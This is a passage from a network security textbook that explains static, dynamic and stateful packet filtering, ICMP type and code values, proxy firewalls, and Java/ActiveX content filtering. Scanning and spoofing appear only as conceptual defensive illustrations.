all other flags set to 0. \nNow, since our packet filter is only looking to block packets which have SYN=1 and all other flags set to 0, these \npackets are happily passed along. The result is that an attacker can analyze the returning data stream to determine \nwhich hosts are offering what services. If the destination host returns an ACK=1, RST=1 (a generic system \nresponse for nonexistent services), the software knows that this is an unused port. If, however, the destination host \nreturns an ACK=1, FIN=1 (the service’s agreeing to close the connect), the FIN scanner knows that there is a \nservice monitoring that port. This means that our packet filter is unable to deter these scanning probes. \n \nFor example, there are software programs called port scanners that can probe a destination host to see if any \nservice ports are open. The port scanner sends a connection request (SYN=1) to all the service ports within a \nspecified range. If any of these connection requests causes the destination host to return a connection request \nacknowledgment (SYN=1, ACK=1), the software knows that there is a service monitoring that port. \nPacket Filtering UDP Traffic \nAs if TCP traffic were not hard enough to control, UDP traffic is actually worse. This is because UDP provides \neven less information regarding a connection’s state than TCP does. Figure 5.2 shows a packet decode of a UDP \nheader. \n \nFigure 5.2: A UDP header decode \nNotice that our UDP header does not use flags for indicating a session’s state. This means that there is no way to \ndetermine if a packet is a data request or a reply to a previous request. The only information that can be used to \nregulate traffic is the source and destination port number. Even this information is of little use in many situations, \nbecause some services use the same source and destination port number. \nFor example, when two Domain Name Servers (DNS) are exchanging information, they use a source and \ndestination port number of 53. Unlike many other services, they do not use a reply port of greater than 1023. This \nmeans that a static packet filter has no effective means of limiting DNS traffic to only a single direction. You \ncannot block inbound traffic to port 53, because that would block data replies as well as data requests. \nThis is why, in many cases, the only effective means of controlling UDP traffic with a static packet filter is either \nto block the port or to let it through and hope for the best. Most people tend to stick with the former solution, \nunless they have an extremely pressing need to allow through UDP traffic (such as running networked Quake \ngames, which use UDP port 26000). \nPacket Filtering ICMP \nThe Internet Control Message Protocol (ICMP) provides background support for the IP protocol. It is not used to \ntransmit user data, but is used for maintenance duty to insure that all is running smoothly. For example, Ping uses \nICMP to insure that there is connectivity between two hosts. Figure 5.3 shows a packet decode of an ICMP \nheader. \n" }, { "page_number": 88, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 88\n \nFigure 5.3: An ICMP header \nNote \nICMP does not use service ports. There is a Type field to identify the ICMP packet type \nas well as a Code field to provide even more granular information about the current \nsession. \nThe Code field can be a bit confusing. For example, in Figure 5.3 the code states Protocol Unreachable; Host \nUnreachable. This could lead you to think that the destination system is not responding. If you compare the source \nIP address for this ICMP packet to the destination IP address in the section after Original IP Packet Header, you \nwill notice that they are the same (10.1.1.100). So if the destination was in fact \"unreachable,\" how could it have \npossibly sent this reply? \nThe combination of these two codes actually means that the requested service was not available. If you look at the \ntop of Figure 5.3, you will see that the transmission that prompted this reply was a Trivial File Transfer Protocol \n(TFTP) request for resume.txt. Only a destination host will generate a protocol unreachable error. Table 5.3 \nidentifies the different type field values for ICMP packets. \nNote \nRemember that UDP does not use a flag field. This makes UDP incapable of letting the \ntransmitting system know that a service is not available. To rectify this problem, ICMP is \nused to notify the transmitting system. \nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \n0 \nEcho \nReply \nResponds to \nan echo \nrequest. \n3 \nDestination \nUnreachab\nle \nIndicates \nthat the \ndestination \nsubnet, host, \nor service \ncannot be \nreached. \n4 \nSource \nQuench \nIndicates \nthat the \nreceiving \nsystem or a \nrouting \ndevice along \nthe route is \nhaving \ntrouble \nkeeping up \nwith the \ninbound data \nflow. Hosts \nthat receive \na source \nquench are \nrequired to \nreduce their \n" }, { "page_number": 89, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 89\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntransmission \nrate. This is \nto insure that \nthe receiving \nsystem will \nnot begin to \ndiscard data \ndue to an \noverload \ninbound \nqueue. \n5 \nRedirect \nInforms a \nlocal host \nthat there is \nanother \nrouter or \ngateway \ndevice that \nis better able \nto forward \nthe data the \nhost is \ntransmitting. \nA redirect is \nsent by local \nrouters. \n8 \nEcho \nRequests \nthat the \ntarget \nsystem \nreturn an \necho reply. \nEcho is used \nto verify end-\nto-end \nconnectivity \nas well as \nmeasure \nresponse \ntime. \n9 \nRouter \nAdvertisem\nent \nIs used by \nrouters to \nidentify \nthemselves \non a subnet. \nThis is not a \ntrue routing \nprotocol, as \nno route \ninformation \nis conveyed. \nIt is simply \nused to let \nhosts on the \nsubnet know \nthe IP \naddresses of \n" }, { "page_number": 90, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 90\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntheir local \nrouters. \n10 \nRouter \nSelection \nAllows a \nhost to query \nfor router \nadvertiseme\nnts without \nhaving to \nwait for the \nnext periodic \nupdate. Also \nreferred to \nas a router \nsolicitation. \n11 \nTime \nExceeded \nInforms the \ntransmitting \nsystems that \nthe Time To \nLive (TTL) \nvalue within \nthe packet \nheader has \nexpired and \nthe \ninformation \nnever \nreached its \nintended \nhost. \n12 \nParameter \nProblem \nIs a catchall \nresponse \nreturned to a \ntransmitting \nsystem \nwhen a \nproblem \noccurs that \nis not \nidentified by \none of the \nother ICMP \ntypes. \n13 \nTimestamp \nIs used \nwhen you \nare looking \nto quantify \nlink speed \nmore than \nsystem \nresponsiven\ness. \nTimestamp \nis similar to \nan Echo \nrequest, \nexcept that a \nquick reply \n" }, { "page_number": 91, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 91\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \nto a \nTimestamp \nrequest is \nconsidered \nmore critical. \n14 \nTimestamp \nReply \nIs a \nresponse to \na Timestamp \nrequest. \n15 \nInformation \nRequest \nHas been \nsuperseded \nby the use of \nbootp and \nDHCP. This \nrequest was \noriginally \nused by self-\nconfiguring \nsystems in \norder to \ndiscover \ntheir IP \naddress. \n16 \nInformation \nReply \nIs a \nresponse to \nan \ninformation \nrequest. \n17 \nAddress \nMask \nRequest \nAllows a \nsystem to \ndynamically \nquery the \nlocal subnet \nas to what is \nthe proper \nsubnet mask \nto be used. If \nno response \nis received, \na host \nshould \nassume a \nsubnet mask \nappropriate \nto its \naddress \nclass. \n18 \nAddress \nMask \nReply \nIs a \nresponse to \nan address \nmask \nrequest. \n30 \nTraceroute \nProvides a \nmore \nefficient \nmeans of \n" }, { "page_number": 92, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 92\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntracing a \nroute from \none IP host \nto another \nthan using \nthe legacy \nTraceroute \ncommand. \nThis option \ncan only be \nused when \nall \nintermediary \nrouters have \nbeen \nprogrammed \nto recognize \nthis ICMP \ntype. \nImplementati\non is via a \nswitch \nsetting using \nthe ping \ncommand. \nTable 5.4 identifies valid codes that may be used when the ICMP type is Destination Unreachable (Type=3). \nTable 5.4: ICMP Type 3 Code Field Values \nCode \nName \nDescription \n0 \nNet \nUnreachable \nThe \ndestination \nnetwork \ncannot be \nreached \ndue to a \nrouting \nerror (such \nas no route \ninformation\n) or an \ninsufficient \nTTL value. \n1 \nHost \nUnreachable \nThe \ndestination \nhost \ncannot be \nreached \ndue to a \nrouting \nerror (such \nas no route \ninformation\n) or an \ninsufficient \nTTL value. \n2 \nProtocol \nUnreachable \nThe \ndestination \n" }, { "page_number": 93, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 93\nTable 5.4: ICMP Type 3 Code Field Values \nCode \nName \nDescription \nhost you \ncontacted \ndoes not \noffer the \nservice you \nrequested. \nThis code \nis typically \nreturned \nfrom a host \nwhile all \nothers are \nreturned \nfrom \nrouters \nalong the \npath. \n4 \nFragmentation \nNeeded and \nDon’t \nFragment \nWas Set \nThe data \nyou are \nattempting \nto deliver \nneeds to \ncross a \nnetwork \nthat uses a \nsmaller \npacket \nsize, but \nthe “don’t \nfragment” \nbit is set. \n5 \nSource Route \nFailed \nThe \ntransmitted \npacket \nspecified \nthe route \nthat should \nbe followed \nto the \ndestination \nhost, but \nthe routing \ninformation \nwas \nincorrect. \nTable 5.5 identifies valid codes that may be used when the ICMP type is redirect (Type=5). \nTable 5.5: ICMP Type 5 Code Field Values \nCode \nName \nDescription \n0 \nRedirect \nDatagra\nm for \nthe \nNetwork \n(or \nSubnet) \nIndicates \nthat \nanother \nrouter on \nthe local \nsubnet has \na better \nroute to the \n" }, { "page_number": 94, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 94\nTable 5.5: ICMP Type 5 Code Field Values \nCode \nName \nDescription \ndestination \nsubnet. \n1 \nRedirect \nDatagra\nm for \nthe Host \nIndicates \nthat \nanother \nrouter on \nthe local \nsubnet has \na better \nroute to the \ndestination \nhost. \nEmploying filtering on the values of the Type and the Code fields, we have a bit more granular control than simply \nlooking at source and destination IP addresses. Not all packet filters are capable of filtering on all Types and \nCodes. For example, many will filter out Type=3, which is destination unreachable, without regard to the Code \nvalue. This limitation can cause some serious communication problems. \nLet’s assume you have a network configuration similar to the one shown in Figure 5.4. Your local network uses a \nToken Ring topology, while your remote business partner uses Ethernet. You wish to give your business partner \naccess to your local Web server in order to receive the latest product updates and development information. \n \nFigure 5.4: Problems blocking destination unreachable messages \nNow, let’s also assume that your router is blocking inbound ICMP destination unreachable messages. You have \ndone this in an effort to block Denial of Service (DoS) attacks by preventing external attackers from sending false \nhost unreachable (Type=5, Code=1) messages. Since your router has limited packet filtering ability, you must \nblock all ICMP Type=5 traffic. \nThis can present you with some problems, however. When your business partner’s employees try to access your \nlocal Web server, they may not be able to view any HTML pages. This problem has the following symptoms—and \ncan be quite confusing: \nƒ \nThe browser on the workstation located on the Ethernet segment appears to resolve the \ndestination host name to an IP address. \nƒ \nThe browser appears to connect to the destination Web server. \n" }, { "page_number": 95, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 95\nƒ \nIf either router provides session logging, traffic appears to flow between the two systems. \nƒ \nThe log on the local Web server indicates that the workstation connected to the Web \nserver and that a number of files were returned. \nSo what has gone wrong? Unfortunately, by blocking all Type=3 traffic you have blocked the Fragmentation \nNeeded (Type=3, Code=4) error messages, as well. This prevents the router from adjusting the Mean Transfer \nUnit (MTU) of the traffic being delivered. \nMTU describes the maximum payload size that can be delivered by a packet of data. In an Ethernet environment, \nthe MTU is 1.5Kb. In a Token Ring environment, the MTU can be as large as 16Kb. When a router receives \npackets that are too large for a destination network, it will send a request to the transmitting system asking it to \nbreak the data into smaller chunks (IMCP Type=3, Code=4). If the router tries to fragment this data itself, it might \nrun into queuing problems if its buffers become full. For this reason, it is easier to have the remote system send \nsmaller packets. \nSo if we watch the flow of data in Figure 5.4 \n1. An Ethernet workstation forms an HTML data request. \n2. This request is delivered to the destination Web server. \n3. The two systems perform a TCP three-packet handshake using 64-byte packets. \n4. Once the handshake is complete, the Web server responds to the data request using a \n16Kb MTU. \n5. This reply reaches the router on the remote Ethernet network. \n6. The Ethernet router issues a fragmentation request (IMCP Type=3, Code=4) back to the \nWeb server asking that it use a 1.5Kb MTU. \n7. The request makes it back to the border router at the Token Ring network. \n8. This router checks its ACL, determines that it is supposed to drop all destination \nunreachable messages (ICMP Type=3), and drops the packet. \nThe fragmentation request never makes it back to your local network, and your remote business partner is unable \nto view your Web pages. When using static packet filtering, always make sure that you fully understand the \nramifications of the traffic you are blocking or allowing to pass through. \nStatic Packet Filtering Summary \nStatic packet filters are non-intelligent filtering devices. They offer little protection against advanced types of \nattack. They look at a minimal amount of information in order to determine which traffic should be allowed to \npass and which traffic should be blocked. Many routers have the ability to perform static packet filtering. \nDynamic Packet Filtering \nDynamic filtering takes static packet filtering one step further by maintaining a connection table in order to \nmonitor the state of a communication session. It does not simply rely on the flag settings. This is a powerful \nfeature that can be used to better control traffic flow. \nFor example, let’s assume that an attacker sends your system a packet of data with a payload designed to crash \nyour system. The attacker may perform some packet trickery in order to make this packet look like a reply to \ninformation requested by the internal system. A regular packet filter would analyze this packet, see that the ACK \nbit is set, and be fooled into thinking that this was a reply to a data request. It would then happily pass the \ninformation along to the internal system. \nA dynamic packet filter would not be so easily fooled, however. When the information was received, the dynamic \npacket filter would reference its connection table (sometimes referred to as a state table). When reviewing the \ntable entries, the dynamic packet filter would realize that the internal system never actually connected to this \nexternal system to place a data request. Since this information had not been explicitly requested, the dynamic \npacket filter would throw the packet in the bit bucket. \nDynamic Packet Filtering in Action \nLet’s take a look at how dynamic packet filtering works, in order to get a better idea of the increased security it \ncan provide. In Figure 5.5, you can see two separate network configurations: one where the internal host is \nprotected by a static packet filter and one where a dynamic packet filter is used. \n" }, { "page_number": 96, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 96\n \nFigure 5.5: The differences between static and dynamic packet filtering \nNow, let’s look at some access rules to see how each of these two firewall devices would handle traffic control. \nThe ACL on both firewalls may look something like this: \nƒ \nAllow the protected host to establish any service sessions with the remote server. \nƒ \nAllow any session that has already been established to pass. \nƒ \nDrop all other traffic. \nThe first rule allows the protected host to establish connections to the remote server. This means that the only time \na packet with the SYN bit set is allowed to pass is if the source address is from the protected host and the \ndestination is the remote server. When this is true, any service on the remote server may be accessed. \nThe second rule is a catchall. Basically it says, “If the traffic appears to be part of a previously established \nconnection, let it pass.” In other words, all traffic is OK—provided that the SYN bit is not set and all other bits are \noff. \nThe third rule states that if any traffic does not fit neatly into one of the first two rules, drop it just to be safe. \nBoth our firewall devices use the same ACL. The difference is in the amount of information each has available in \norder to control traffic. Let’s transmit some traffic to see what happens. \nIn Figure 5.6, the internal system tries to set up a communication session with the remote server. Since all passing \ntraffic passes the criteria set up in the access control lists, both firewalls allow this traffic to pass. \n \nFigure 5.6: Connection establishment from the protected host \n" }, { "page_number": 97, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 97\nOnce the handshake is complete, our protected host makes a data request. This packet will have the ACK bit set, \nand possibly the PSH bit. When the remote server receives this request, it will also respond with the ACK bit set \nand possibly the PSH bit, as well. Once the data transfer is complete, the session will be closed, each system \ntransmitting a packet with the FIN bit set. \nFigure 5.7 shows this established session passing data. Note that we have no problems passing our firewall devices \nbecause of our second rule: “Allow any session that has already been established to pass.” Each firewall is making \nthis determination in a slightly different way, however. \n \nFigure 5.7: An established session between the two hosts \nOur static packet filter is simply looking at the flag field to see if the SYN bit is the only bit set. Since this is not \ntrue, the static packet filter assumes that this data is part of an established session and lets it pass through. \nOur dynamic packet filter is doing the same check, but it also created a state table entry when the connection was \nfirst established. Every time the remote server tries to respond to the protected host, the state table is referenced to \ninsure the following: \nƒ \nThe protected host actually made a data request. \nƒ \nThe source port information matches the data request. \nƒ \nThe destination port information matches the data request. \nIn addition, the dynamic packet filter may even verify that the sequence and acknowledgment numbers all match. \nIf all this data is correct, the dynamic packet filter also allows the packets to pass. Once the FIN packets are sent \nby each system, the state table entry will be removed. Additionally, if no reply is received for a period of time \n(anywhere from one minute to one hour, depending on the configuration), the firewall will assume that the remote \nserver is no longer responding and will again delete the state table entry. This keeps the state table current. \nNow let’s say that Woolly Attacker notices this data stream and decides to attack the protected host. The first thing \nhe tries is a port scan on the protected system to see if it has any listening services. As you can see in Figure 5.8, \nthis scan is blocked by both firewall devices, because the initial scanning packets have the SYN bit set and all \nother bits turned off. \n" }, { "page_number": 98, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 98\n \nFigure 5.8: Both filtering methods can block a port scan. \nNot to be put off, Woolly Attacker attempts to perform a FIN scan by transmitting packets with the ACK and FIN \nbits set to 1. Now the results are a bit different. Since the packet filter is simply looking for the SYN bit being set \nto 1, it happily passes this traffic along, as this condition has not been met. \nOur dynamic packet filter, however, is a bit more fussy. It recognizes that the SYN bit is not set and proceeds to \ncompare this traffic to the state table. At this point, it realizes that our protected host has never set up a \ncommunication session with Woolly Attacker. There is no legitimate reason that Woolly Attacker should be trying \nto end a session if our protected host never created one in the first place. For this reason, the traffic would be \nblocked. This is shown in Figure 5.9. \n \nFigure 5.9: The effects of performing a FIN scan \nSo what if Woolly Attacker tries to spoof the firewall by pretending to be the remote server? In order for him to \nperform this attack successfully, a number of conditions would have to be met: \nƒ \nWoolly Attacker would have to spoof or assume the IP address of the remote server. \nƒ \nIf the address has been assumed, Woolly Attacker might have to take further measures \nto insure that the remote server cannot respond to requests on its own. \nƒ \nIf the address has been spoofed, Woolly Attacker would need some method of reading \nreplies off the wire. \nƒ \nWoolly Attacker would need to know the source and destination service ports being used \nso that his traffic will match the entries in the state table. \nƒ \nDepending on the implementation, the acknowledgment and sequence numbers might \nhave to match, as well. \n" }, { "page_number": 99, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 99\nƒ \nWoolly Attacker would have to manipulate the communication session fast enough to \navoid timeouts, both on the firewall and on the protected host. \nSo while it is possible to launch this type of attack, it is not very easy to succeed. Clearly, Woolly Attacker would \nhave to be very knowledgeable and feel that he has much to gain by going to all this effort. \nKeep in mind that this discussion is theory only. Your actual mileage with a specific firewall product may vary. \nFor example, at the time of this writing, Check Point’s FireWall-1 product (which is a dynamic packet filter) has a \ntouted feature that allows the state table to be maintained even after a rule set change. Unfortunately, this feature \nalso means that state is not always maintained as effectively as it should be. In the FIN scan attack just described, \nCheck Point’s FireWall-1 would have passed along the scan packets, as well. \nUDP Traffic and Dynamic Packet Filtering \nAs you have seen, static packet filtering has some real problems handling UDP traffic. This is because the UDP \nheader has zero information regarding connection state. This is where dynamic packet filtering can be extremely \nuseful, as the firewall itself is able to remember state information. It does not rely on information within the packet \nheader but maintains its own tables regarding the state of all sessions. \nTip \nIt is strongly advised that dynamic packet filtering be used instead of static filtering when \nUDP traffic must be allowed through. The addition of state table information makes this \nfirewall method far more secure with no loss in service. \nIs My Transport Supported? \nThe implementation of dynamic packet filtering is transport specific. That means it has to be specifically \nimplemented for each protocol transport, such as TCP, UDP, and ICMP. When choosing a dynamic packet filter, \nmake sure that the firewall is capable of maintaining state for all transports that you wish to use. \nFor example, with version 1.x of FireWall-1, state was only maintained with UDP traffic. While it is true that this \nis where such traffic control was most needed, TCP and ICMP were regulated in the same manner as a static \npacket filter. It was not until version 2.x that state was maintained for TCP traffic, as well. \nDynamic Packet Filter Summary \nDynamic packet filters are intelligent devices that make traffic-control decisions based on packet attributes and \nstate tables. State tables enable the firewall device to “remember” previous communication packet exchanges and \nmake judgments based on this additional information. \nThe biggest limitation of a dynamic packet filter is that it cannot make filtering decisions based upon payload, \nwhich is the actual data contained within the packet. In order to filter on payload, you must use a proxy-based \nfirewall. \nStateful Filtering \nStateful filtering improves upon the power of dynamic packet filtering. First implemented by Check Point under \nthe name “Stateful Multilevel Inspection,” stateful rules are protocol-specific, keeping track of the context of a \nsession (not just its state). This allows filtering rules to differentiate between the various connectionless protocols \n(like UDP, NFS, and RPC), which—because of their connectionless nature—were previously immune to \nmanagement by static filtering and were not uniquely identified by dynamic filtering. \nThe greatest addition that stateful filtering provides to dynamic filtering is the ability to maintain application state, \nnot just connection state. Application state allows a previously authenticated user to create new connections \nwithout reauthorizing, whereas connection state just maintains that authorization for the duration of a single \nsession. \nAn example of this would be a firewall that allows internal access based on per-user authentication. If an \nauthenticated user attempts to open another browser, dynamic filtering router would prompt the user for his \npassword. Stateful filtering, however, would recognize that a pre-existing (and concurrent) connection is being \nmaintained with that same machine, and would automatically authorize the additional session. \nProxies \nA proxy server (sometimes referred to as an application gateway or forwarder) is an application that mediates \ntraffic between two network segments. Proxies are often used instead of filtering to prevent traffic from passing \ndirectly between networks. With the proxy acting as mediator, the source and destination systems never actually \n“connect” with each other. The proxy plays middleman in all connection attempts. \n" }, { "page_number": 100, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 100\nHow a Proxy Passes Traffic \nUnlike its packet-filtering counterparts, a proxy does not route any traffic. In fact, a properly configured proxy will \nhave all routing functionality disabled. As its name implies, the proxy stands in or speaks for each system on each \nside of the firewall. \nFor an analogy, think of two people speaking through a language interpreter. While it is true these two people are \ncarrying on a conversation, they never actually speak to one another. All communication passes through the \ninterpreter before being passed on to the other party. The interpreter might have to clean up some of the language \nused, or filter out comments or statements that might seem hostile. \nTo see how this relates to network communications, refer to Figure 5.10. Our internal host wishes to request a \nWeb page from the remote server. It formulates the request and transmits the information to the gateway leading to \nthe remote network, which in this case is the proxy server. \n \nFigure 5.10: A proxy mediating a communication session \nOnce the proxy receives the request, it identifies what type of service the internal host is trying to access. Since in \nthis case the host has requested a Web page, the proxy passes the request to a special application used only for \nprocessing HTTP sessions. This application is simply a program running in memory that has the sole function of \ndealing with HTTP communications. \nWhen the HTTP application receives the request, it verifies that the ACL allows this type of traffic. If the traffic is \nacceptable, the proxy formulates a new request to the remote server—only it uses itself as the source system. In \nother words, the proxy does not simply pass the request along; it generates a new request for the remote \ninformation. \nThis new request is then sent to the remote server. If the request were checked with a network analyzer, it would \nlook like the proxy had made the HTTP request, not the Internal host. For this reason, when the remote server \nresponds, it responds to the proxy server. \nOnce the proxy server receives the reply, it again passes the response up to the HTTP application. The HTTP \napplication then scrutinizes the actual data sent by the remote server for abnormalities. If the data is acceptable, \nthe HTTP application creates a new packet and forwards the information to the internal host. \nAs you can see, the two end systems never actually exchange information directly. The proxy constantly butts into \nthe conversation to make sure that all goes securely. \nSince proxies must “understand” the application protocol being utilized, they can also implement protocol-specific \nsecurity. For example, an inbound FTP proxy can be configured to filter out all put and mput requests received by \nan external system. This could be used to create a read-only FTP server: people outside the firewall would be \nunable to send the FTP server the commands required to initiate a file write. They could, however, perform a file \nget, which would allow them to receive files from the FTP server. \nTip \nProxy servers are application specific. In order to support a new protocol via a proxy, a \nproxy must be developed for that protocol. If you select a proxy firewall, make sure that it \nsupports all the applications you wish to use. \nThere are stripped-down proxies know as plug gateways. These are not true proxies because they do not \nunderstand the application they are supporting. Plug gateways simply provide connectivity for a specific service \nport and offer little benefit beyond dynamic filtering. \nClient Configuration in a Proxy Environment \nSome proxy servers require all internal hosts to run connection software such as SOCKS or a modified winsock.dll \nfile. Each of these programs serves a single function: to forward all non-local traffic to the proxy. Depending on \nthe environment, this can be extremely beneficial or a complete pain in the rear quarter. \n" }, { "page_number": 101, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 101\nBenefits of a Proxy Client \nThere are a number of benefits to running proxy client software. The first is ease of configuration. Since the client \nis designed to forward all non-local data requests to the proxy, the only required configuration information is a \nvalid IP address and subnet mask. Router and DNS parameters can be ignored, because this information only \nneeds to be configured on the proxy. \nIn fact, many proxies do not even require that you use IP as a protocol. For example, Microsoft Proxy Server 2.0 \nships with a replacement winsock.dll file, which allows IPX to be used on the local workstations. Once the traffic \nreaches the proxy, it is translated to IP and forwarded to the remote server. For an environment that is \npredominantly IPX-based, this can be a very simple solution that avoids running additional protocols on the \nnetwork. \nProxy clients can also offer transparent authentication in order to validate outbound connection attempts based on \nlogon name and password. For example, Novell’s BorderManager integrates with NetWare Directory Services \n(NDS) to transparently authenticate users as they access the Internet. As long as a user is authenticated to NDS, \nthat user is not prompted for a password when accessing Internet resources. \nNote \nUser authentication of outbound sessions is used for increased logging and management. \nIf authentication is not used, a firewall must rely on the source IP address to identify who \nhas accessed which Internet resources. This can be a problem; all a user has to do in order \nto change her identity is change her IP address. This can be a serious problem in a DHCP \nor bootp environment if you wish to track all of your users. \nDrawbacks to a Proxy Client \nUnfortunately, there are a number of drawbacks to using a proxy client. The first is deployment. If you have 1,000 \nmachines that will need to use the proxy server, plan on loading additional software on each of these machines. \nSoftware compatibility may also be a problem; some applications may not be compatible with the replacement \nwinsock.dll file. For example, many Winsock replacements are still written to the 1.x specification, although there \nare now applications that require Winsock 2.x. \nAnd what if many of your desktop machines do not run Windows? Many proxies do not provide client software \nfor any operating system other than Windows. In this case, you have to be sure that all IP applications you wish to \nuse are SOCKS compliant. While there are SOCKS versions of many IP applications such as telnet and FTP, it’s \nall too often the case that a favorite application is not SOCKS compliant. \nClient software can also be a problem for mobile or laptop users. For example, let’s say you are a laptop user who \nconnects to the local network during the day and dials in to your Internet Service Provider (ISP) in the evening. In \nthis case, you would have to make sure that your proxy client is enabled during the day, but disabled at night. Not \nexactly the type of procedure you’d want to have your pointy-haired boss performing on a daily basis. \nFinally, a proxy client can be a real problem if you have multiple network segments. This is because the proxy \nclient expects to forward all non-local traffic to the proxy server—not a good solution if you have a large network \nenvironment with many subnets. While some configurations do allow you to exempt certain subnets from being \nforwarded to the proxy, this typically involves modifying a text file stored on the local workstation. Again, if you \nadminister 1,000 desktop machines, plan on putting in quite a few long nights just to update all your desktop \nmachines regarding a subnet address change. \nTransparent Proxies \nNot all proxies require special client software. Some can operate as a transparent proxy, which means that all \ninternal hosts are configured as though the proxy were a regular router leading to the Internet. As the proxy \nreceives traffic, it processes the traffic in a fashion similar to our example in Figure 5.10. \nIf you decide that a proxy firewall is the best fit for your security requirements, make sure you also decide whether \nyou wish to use a transparent or a non-transparent proxy. The marketing material for many proxy packages can be \na bit vague about whether the package requires special client software. Typically, if a product claims to support \nSOCKS, it is not a transparent proxy. Make sure you know the requirements before investing in a firewall \nsolution. \nFiltering Java, ActiveX, and HTML Scripts \nAs you have seen, proxies can analyze the payload of a packet of data and make decisions as to whether this \npacket should be passed or dropped. This is a powerful feature, that gives the administrator far more ability to \n" }, { "page_number": 102, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 102\nscrutinize what type of data should be allowed into the network. When it comes to content filtering, the first thing \nmost people think about is Java and ActiveX. \nJava is a portable programming language. Portable means it is designed to be run on any network operating \nsystem. Typically, Java support is accomplished through the use of a Java-aware Web browser. Java programs are \nreferred to as applets. \nActiveX is a specialized implementation of a Microsoft Object Linking and Embedding (OLE) or Component \nObject Model (COM) object. With ActiveX, you create a self-sufficient program known as an ActiveX control. \nThe benefit to an ActiveX control is that it can be shared across multiple applications. ActiveX is not a \nprogramming language. ActiveX controls are created using some other programming language such as C++, \nPowerBuilder, Visual Basic, or even Microsoft Java. \nJava applets and ActiveX controls can be pulled down from a server and run on any compatible Web browser. \nFunctionality for these programs can include anything from dancing icons to shared applications. There are few \nlimits to the types of programs that can be created. \nThis is where our problems begin. While both Java and ActiveX were developed with security in mind (Java \nprobably more so than ActiveX), quite a few exploits have been discovered in both. \nNote \nTo have a look at the kinds of exploits that can be performed, point your Web browser at \nwww.digicrime.com. This site contains a number of Java and ActiveX exploits that show \njust how malicious these programs can be in the wrong hands. \nNow that you know why using Java and ActiveX can be a bad thing, the question is, what can you do about it? \nMany proxy firewalls provide the ability to filter out some or all Java and ActiveX programming code. This allows \nyour users to continue accessing remote Web sites—without fear of running a malicious application. \nFor example, FireWall-1 includes proxy applications that are referred to as security servers. Security servers give \nthe firewall administrator the ability to identify certain program codes that he wishes to filter out. Figure 5.11 \nshows the URI dialog box that allows the FireWall-1 administrator to pick and choose the types of code he wants \nto filter out. \n \nFigure 5.11: The URI Definition dialog box allows you to filter programming code. \nThe HTML Weeding check boxes allow the administrator to filter out all tag references to Java scripts, Java \napplets, or even ActiveX controls. The Block JAVA Code check box causes the firewall to filter out any and all \nJava programming code. The combination of these options provides some flexibility in determining what types of \ndata are allowed to reach your internal Web browsers. \nNote \nEnabling these features blocks both good and bad code, without distinguishing \nbetween the two. In other words, your choices are all or nothing. There are, \nhowever, proxies that can selectively filter out only “known to be malicious” \nprogramming code. While this allows some Java and/or ActiveX to be passed \nthrough the proxy, it does so at a reduced level of security. These proxies can \nonly filter out known problems; they cannot help with exploits that have yet to be \ndiscovered. Unless you stay on top of the latest exploits, you may still end up \nletting some malicious code past your firewall. \n \nWhat Type of Firewall Should I Use? \nThis section title asks a completely loaded question. Post this question to any firewall discussion list, and you are \nguaranteed to start a flame war. (For real fun, follow this question up with “Should I run my firewall on \nMacintosh, UNIX, Linux, NT, Windows 2000 or a vendor-specific platform?”) \n" }, { "page_number": 103, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 103\nThere are no clear-cut absolutes for choosing a particular type of firewall solution. Anyone who tells you \notherwise has a product to push. Cost, business need, and security requirements should all be considered when you \nare looking for a proper solution. \nSince static filtering is considered weak, it is the lowest level of perimeter security. It is also the most basic, \nhowever, as static filtering ability is built into most routers. If you have a permanent WAN connection, chances \nare you are using a router. If you have a router, you should be performing static packet filtering as a minimum. \nDynamic Filtering or Proxy? \nEach of these firewalls has its strengths and weaknesses. Dynamic filtering is typically easier to work with than a \nproxy and has a better ability to meet most business needs, but it is not quite as competent at screening traffic as a \nproxy server may be. While both a dynamic packet filter and a proxy will block traffic known to be bad, each can \nact a little differently in the face of dubious traffic. \nFor example, let’s say you have two firewalls: a dynamic packet filter and a proxy. Each receives a packet of data \nthat has the high-priority flag set for a certain application, and neither has been programmed as to how to handle \nthis type of data. Typically (but not always), the dynamic packet filter would pass questionable traffic, while the \nproxy would drop it. In addition, since the proxy is application aware, it could further check the contents of the \nactual data, while the dynamic packet filter could not. Again, this is theoretical comparison between two forms of \nperimeter protection. Your actual mileage may vary, depending on the specific product you choose. \nProxies tend to be a bit more secure, but it can be more difficult to get them to fit a particular business need. For \nexample, many proxies have trouble supporting modern services such as Microsoft’s NetMeeting or Real Audio \nand Video. So while the level of perimeter security is higher, this is of little comfort if a proxy is unable to meet \nthe business requirements of the organization it is protecting. \nThe most secure perimeter security device is a pair of wire cutters. Since few organizations are willing to use this \nsecurity device, and want Internet connectivity, some level of risk must be assumed. A proper firewall selection \nmeets all the business needs of connectivity while employing the highest level of security possible. Additionally, a \ngood firewall product will incorporate both dynamic packet filtering and proxy technology in order to provide the \nhighest level of security and flexibility. \n \nWhich Platform Should I Choose? \nThis topic has been the subject of many a religious war. Search the archives of any firewall mailing list and you \nwill find volumes on this specific topic. Just like a religious belief system, the selection of a proper firewall \nplatform is a personal decision that you should make only after proper investigation. \nThis section is not going to tell you which platform to choose; it will simply point out some of the strengths and \nweaknesses of each platform and leave the final decision up to you. Just like choosing a proper firewall product, \nchoosing the operating system to run it on is clearly not a one-size-fits-all prospect. \nOne primary distinction that exists is between server-based and appliance-based firewalls. A server-based firewall 